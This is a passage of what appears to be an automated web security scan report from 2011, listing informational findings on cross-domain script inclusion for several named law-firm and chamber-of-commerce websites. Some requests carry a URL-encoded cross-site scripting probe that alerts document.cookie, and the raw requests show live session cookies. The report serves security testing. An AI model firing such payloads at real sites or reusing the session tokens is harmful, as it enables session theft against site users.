GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/footer_email_icon.gif HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:34 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.77. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/footer_title_navigation.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/footer_title_navigation.gif

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/footer_title_navigation.gif HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:33 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.78. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/stylesheet.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/stylesheet.css

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/stylesheet.css HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:51:46 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.79. http://www.ebglaw.com/404.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebglaw.com
Path:   /404.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /404.aspx HTTP/1.1
Host: www.ebglaw.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=mkavhri4srbzl255z4ebp2i3; __utmz=72265415.1295452418.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27; __utma=72265415.606180877.1295452418.1295452418.1295452418.1; __utmc=72265415; __utmb=72265415.1.10.1295452418

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:53:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 56291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head pro
...[SNIP]...
</script>
   

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js"></script>
...[SNIP]...

16.80. http://www.ebglaw.com/showoffice.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebglaw.com
Path:   /showoffice.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /showoffice.aspx?Show=542 HTTP/1.1
Host: www.ebglaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=uhd35155lvi11l45rc200ezs; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 63652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head pro
...[SNIP]...
</script>
   

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js"></script>
...[SNIP]...

16.81. http://www.hoganlovells.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.hoganlovells.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:08:43 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1109; path=/
Set-Cookie: PortletId=1004701; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 98842
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/
Content-Length: 98842


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

   
...[SNIP]...
<meta name="ROBOTS" content="NOYDIR" />
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0009/8877.js"> </script>
...[SNIP]...

16.82. http://www.hoganlovells.com/AboutUs/Online_Client_Service/Overview/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /AboutUs/Online_Client_Service/Overview/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /AboutUs/Online_Client_Service/Overview/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:59:47 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1221; path=/
Set-Cookie: PortletId=1295002; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 94142


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0009/8877.js"> </script>
...[SNIP]...

16.83. http://www.hoganlovells.com/aboutus/history/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /aboutus/history/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /aboutus/history/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:59:21 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1071; path=/
Set-Cookie: PortletId=9201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 97393


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0009/8877.js"> </script>
...[SNIP]...

16.84. http://www.hoganlovells.com/aboutus/overview/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /aboutus/overview/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /aboutus/overview/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:59:02 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1068; path=/
Set-Cookie: PortletId=6201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 94661


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head><meta name="description" content="Hogan Lovells is a law firm that sees the whole picture an
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0009/8877.js"> </script>
...[SNIP]...

16.85. http://www.hoganlovells.com/de/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /de/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /de/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:59:01 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=f8307c75-afc6-47c2-bcc9-05e6ce2e6da5; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1109; path=/
Set-Cookie: PortletId=1004701; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 97754


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

   
...[SNIP]...
<meta name="ROBOTS" content="NOYDIR" />
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0009/8877.js"> </script>
...[SNIP]...

16.86. http://www.hoganlovells.com/es/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /es/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /es/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:59:12 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=a40a92ff-2e69-4b79-aa30-0c1bc0a78076; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1109; path=/
Set-Cookie: PortletId=1004701; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 88749


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

   
...[SNIP]...
<meta name="ROBOTS" content="NOYDIR" />
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0009/8877.js"> </script>
...[SNIP]...

16.87. http://www.hoganlovells.com/fr/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /fr/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /fr/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:58:59 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=615eedbc-fa87-4a07-9a8b-00391cec67e4; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1109; path=/
Set-Cookie: PortletId=1004701; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 89716


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

   
...[SNIP]...
<meta name="ROBOTS" content="NOYDIR" />
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0009/8877.js"> </script>
...[SNIP]...

16.88. http://www.hoganlovells.com/industries/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /industries/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /industries/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
